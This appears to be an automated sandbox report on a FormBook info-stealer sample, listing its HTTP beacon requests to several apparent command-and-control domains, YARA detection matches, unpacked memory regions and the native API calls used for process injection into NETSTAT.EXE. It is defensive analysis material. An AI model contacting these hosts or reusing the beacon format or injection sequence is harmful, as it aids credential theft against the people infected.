            Source: global trafficHTTP traffic detected: GET /shjn/?BZXds2=yig434buSM9mjL6sFft/wR3J8yL+W/NNnR041iD/jBfLeA0894Dqi/iq5ABxMbWmFo1f&jlW=5jIhet3 HTTP/1.1Host: www.qumpan.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shjn/?BZXds2=CnEZGgp6DBB+pDnOuIixGpXAp+VMVpLueRIhGB4QWd57GYod+SwBDNIEOLI4bN8ncwp9&jlW=5jIhet3 HTTP/1.1Host: www.2ed58fwec.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shjn/?BZXds2=q+IOPKcWAF8HOZaSc4cEUEu5wE6+kd2dEtRaCxRabbawa99LvN+eX182jK5p9vZ8QaPu&jlW=5jIhet3 HTTP/1.1Host: www.factechcolombia.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shjn/?BZXds2=U4D/9jyl4LwInOaHPL1dM7FXipfOkLnA1xY1V+vBJ7elQfZSHChwpT42Icw9AFkuQMKq&jlW=5jIhet3 HTTP/1.1Host: www.sakina.digitalConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shjn/?BZXds2=DRu3/33A+HP1NRfSxdp3iuQBFZZLKD7J2S+jM/VNqTCHnWN0FA+Y+jnmu1WXSKeywE4Q&jlW=5jIhet3 HTTP/1.1Host: www.ninetofivetheses.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shjn/?BZXds2=WC6mZM05IzNhf68ryDG6ZhC66ih1U/GhUTmjWmmt6hbztHfpOMrJyOcko+4VoC7T/uTe&jlW=5jIhet3 HTTP/1.1Host: www.privatelymeeting.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

            E-Banking Fraud:

            barindex
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 2.2.OApfyh3Vfm.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.OApfyh3Vfm.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000008.00000002.932646758.0000000002ED0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.678698717.00000000036E9000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000000.721050737.000000000E3E3000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.733402513.0000000000C40000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.932251998.0000000000A40000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.732622247.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000000.707324190.000000000E3E3000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.932766268.0000000002FD0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.733303367.0000000000C10000.00000040.00020000.sdmp, type: MEMORY

            System Summary:

            barindex
            Malicious sample detected (through community Yara rule)Show sources
            Source: 2.2.OApfyh3Vfm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 2.2.OApfyh3Vfm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 2.2.OApfyh3Vfm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 2.2.OApfyh3Vfm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000008.00000002.932646758.0000000002ED0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000008.00000002.932646758.0000000002ED0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000001.00000002.678698717.00000000036E9000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000001.00000002.678698717.00000000036E9000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000003.00000000.721050737.000000000E3E3000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000003.00000000.721050737.000000000E3E3000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000002.00000002.733402513.0000000000C40000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000002.00000002.733402513.0000000000C40000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000008.00000002.932251998.0000000000A40000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000008.00000002.932251998.0000000000A40000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000002.00000002.732622247.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000002.00000002.732622247.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000003.00000000.707324190.000000000E3E3000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000003.00000000.707324190.000000000E3E3000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000008.00000002.932766268.0000000002FD0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000008.00000002.932766268.0000000002FD0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000002.00000002.733303367.0000000000C10000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000002.00000002.733303367.0000000000C10000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            .NET source code contains very large stringsShow sources
            Source: OApfyh3Vfm.exe, UX.WinForms/Api/NativeWindowHook.csLong String: Length: 75776
            Source: 1.0.OApfyh3Vfm.exe.290000.0.unpack, UX.WinForms/Api/NativeWindowHook.csLong String: Length: 75776
            Source: 1.2.OApfyh3Vfm.exe.290000.0.unpack, UX.WinForms/Api/NativeWindowHook.csLong String: Length: 75776
            Source: 2.2.OApfyh3Vfm.exe.620000.1.unpack, UX.WinForms/Api/NativeWindowHook.csLong String: Length: 75776
            Source: 2.0.OApfyh3Vfm.exe.620000.0.unpack, UX.WinForms/Api/NativeWindowHook.csLong String: Length: 75776
            Source: OApfyh3Vfm.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
            Source: 2.2.OApfyh3Vfm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 2.2.OApfyh3Vfm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 2.2.OApfyh3Vfm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 2.2.OApfyh3Vfm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000008.00000002.932646758.0000000002ED0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000008.00000002.932646758.0000000002ED0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000001.00000002.678698717.00000000036E9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000001.00000002.678698717.00000000036E9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000003.00000000.721050737.000000000E3E3000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000003.00000000.721050737.000000000E3E3000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000002.00000002.733402513.0000000000C40000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000002.00000002.733402513.0000000000C40000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000008.00000002.932251998.0000000000A40000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000008.00000002.932251998.0000000000A40000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000002.00000002.732622247.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000002.00000002.732622247.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000003.00000000.707324190.000000000E3E3000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000003.00000000.707324190.000000000E3E3000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000008.00000002.932766268.0000000002FD0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000008.00000002.932766268.0000000002FD0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000002.00000002.733303367.0000000000C10000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000002.00000002.733303367.0000000000C10000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 1_2_00C7C1541_2_00C7C154
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 1_2_00C7E5881_2_00C7E588
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 1_2_00C7E5981_2_00C7E598
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 1_2_057508D81_2_057508D8
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 1_2_057535301_2_05753530
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 1_2_0575352E1_2_0575352E
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 1_2_05759C501_2_05759C50
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 1_2_057500401_2_05750040
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_004010302_2_00401030
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_0041D15F2_2_0041D15F
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_0041C98F2_2_0041C98F
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_0041BAC22_2_0041BAC2
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_00408C7B2_2_00408C7B
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_00408C3B2_2_00408C3B
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_00408C802_2_00408C80
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_0041C5CC2_2_0041C5CC
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_00402D872_2_00402D87
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_00402D902_2_00402D90
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_00402FB02_2_00402FB0
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012441202_2_01244120
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_0122F9002_2_0122F900
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012E10022_2_012E1002
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012520A02_2_012520A0
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012F20A82_2_012F20A8
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_0123B0902_2_0123B090
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012F28EC2_2_012F28EC
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012F2B282_2_012F2B28
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_0125EBB02_2_0125EBB0
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012EDBD22_2_012EDBD2
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012F22AE2_2_012F22AE
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_01220D202_2_01220D20
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012F2D072_2_012F2D07
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012F1D552_2_012F1D55
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012525812_2_01252581
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_0123D5E02_2_0123D5E0
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012F25DD2_2_012F25DD
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_0123841F2_2_0123841F
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012ED4662_2_012ED466
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012F1FF12_2_012F1FF1
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_01246E302_2_01246E30
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012ED6162_2_012ED616
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012F2EF72_2_012F2EF7
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03592B288_2_03592B28
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0358DBD28_2_0358DBD2
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034FEBB08_2_034FEBB0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_035922AE8_2_035922AE
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034CF9008_2_034CF900
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034E41208_2_034E4120
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_035810028_2_03581002
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_035928EC8_2_035928EC
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034DB0908_2_034DB090
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034F20A08_2_034F20A0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_035920A88_2_035920A8
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03591FF18_2_03591FF1
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034E6E308_2_034E6E30
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03592EF78_2_03592EF7
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03591D558_2_03591D55
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03592D078_2_03592D07
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034C0D208_2_034C0D20
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_035925DD8_2_035925DD
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034DD5E08_2_034DD5E0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034F25818_2_034F2581
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0358D4668_2_0358D466
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034D841F8_2_034D841F
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02FEC98F8_2_02FEC98F
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02FD2FB08_2_02FD2FB0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02FD8C808_2_02FD8C80
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02FD8C7B8_2_02FD8C7B
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02FD8C3B8_2_02FD8C3B
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02FEC5C08_2_02FEC5C0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02FD2D908_2_02FD2D90
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02FD2D878_2_02FD2D87
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: String function: 034CB150 appears 35 times
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: String function: 0122B150 appears 35 times
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_004185C0 NtCreateFile,2_2_004185C0
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_00418670 NtReadFile,2_2_00418670
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_004186F0 NtClose,2_2_004186F0
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_004187A0 NtAllocateVirtualMemory,2_2_004187A0
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_0041866E NtReadFile,2_2_0041866E
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_0041879A NtAllocateVirtualMemory,2_2_0041879A
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_01269910 NtAdjustPrivilegesToken,LdrInitializeThunk,2_2_01269910
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012699A0 NtCreateSection,LdrInitializeThunk,2_2_012699A0
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_01269860 NtQuerySystemInformation,LdrInitializeThunk,2_2_01269860
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_01269840 NtDelayExecution,LdrInitializeThunk,2_2_01269840
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012698F0 NtReadVirtualMemory,LdrInitializeThunk,2_2_012698F0
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_01269A20 NtResumeThread,LdrInitializeThunk,2_2_01269A20
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_01269A00 NtProtectVirtualMemory,LdrInitializeThunk,2_2_01269A00
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_01269A50 NtCreateFile,LdrInitializeThunk,2_2_01269A50
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_01269540 NtReadFile,LdrInitializeThunk,2_2_01269540
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012695D0 NtClose,LdrInitializeThunk,2_2_012695D0
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_01269710 NtQueryInformationToken,LdrInitializeThunk,2_2_01269710
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012697A0 NtUnmapViewOfSection,LdrInitializeThunk,2_2_012697A0
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_01269780 NtMapViewOfSection,LdrInitializeThunk,2_2_01269780
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_01269FE0 NtCreateMutant,LdrInitializeThunk,2_2_01269FE0
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_01269660 NtAllocateVirtualMemory,LdrInitializeThunk,2_2_01269660
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012696E0 NtFreeVirtualMemory,LdrInitializeThunk,2_2_012696E0
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_01269950 NtQueueApcThread,2_2_01269950
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012699D0 NtCreateProcessEx,2_2_012699D0
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_01269820 NtEnumerateKey,2_2_01269820
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_0126B040 NtSuspendThread,2_2_0126B040
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012698A0 NtWriteVirtualMemory,2_2_012698A0
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_01269B00 NtSetValueKey,2_2_01269B00
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_0126A3B0 NtGetContextThread,2_2_0126A3B0
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_01269A10 NtQuerySection,2_2_01269A10
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_01269A80 NtOpenDirectoryObject,2_2_01269A80
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_01269520 NtWaitForSingleObject,2_2_01269520
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_0126AD30 NtSetContextThread,2_2_0126AD30
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_01269560 NtWriteFile,2_2_01269560
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012695F0 NtQueryInformationFile,2_2_012695F0
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_01269730 NtQueryVirtualMemory,2_2_01269730
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_0126A710 NtOpenProcessToken,2_2_0126A710
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_01269760 NtOpenProcess,2_2_01269760
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_0126A770 NtOpenThread,2_2_0126A770
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_01269770 NtSetInformationFile,2_2_01269770
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_01269610 NtEnumerateValueKey,2_2_01269610
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_01269670 NtQueryInformationProcess,2_2_01269670
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_01269650 NtQueryValueKey,2_2_01269650
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012696D0 NtCreateKey,2_2_012696D0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03509A50 NtCreateFile,LdrInitializeThunk,8_2_03509A50
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03509910 NtAdjustPrivilegesToken,LdrInitializeThunk,8_2_03509910
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_035099A0 NtCreateSection,LdrInitializeThunk,8_2_035099A0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03509840 NtDelayExecution,LdrInitializeThunk,8_2_03509840
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03509860 NtQuerySystemInformation,LdrInitializeThunk,8_2_03509860
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03509710 NtQueryInformationToken,LdrInitializeThunk,8_2_03509710
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03509FE0 NtCreateMutant,LdrInitializeThunk,8_2_03509FE0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03509780 NtMapViewOfSection,LdrInitializeThunk,8_2_03509780
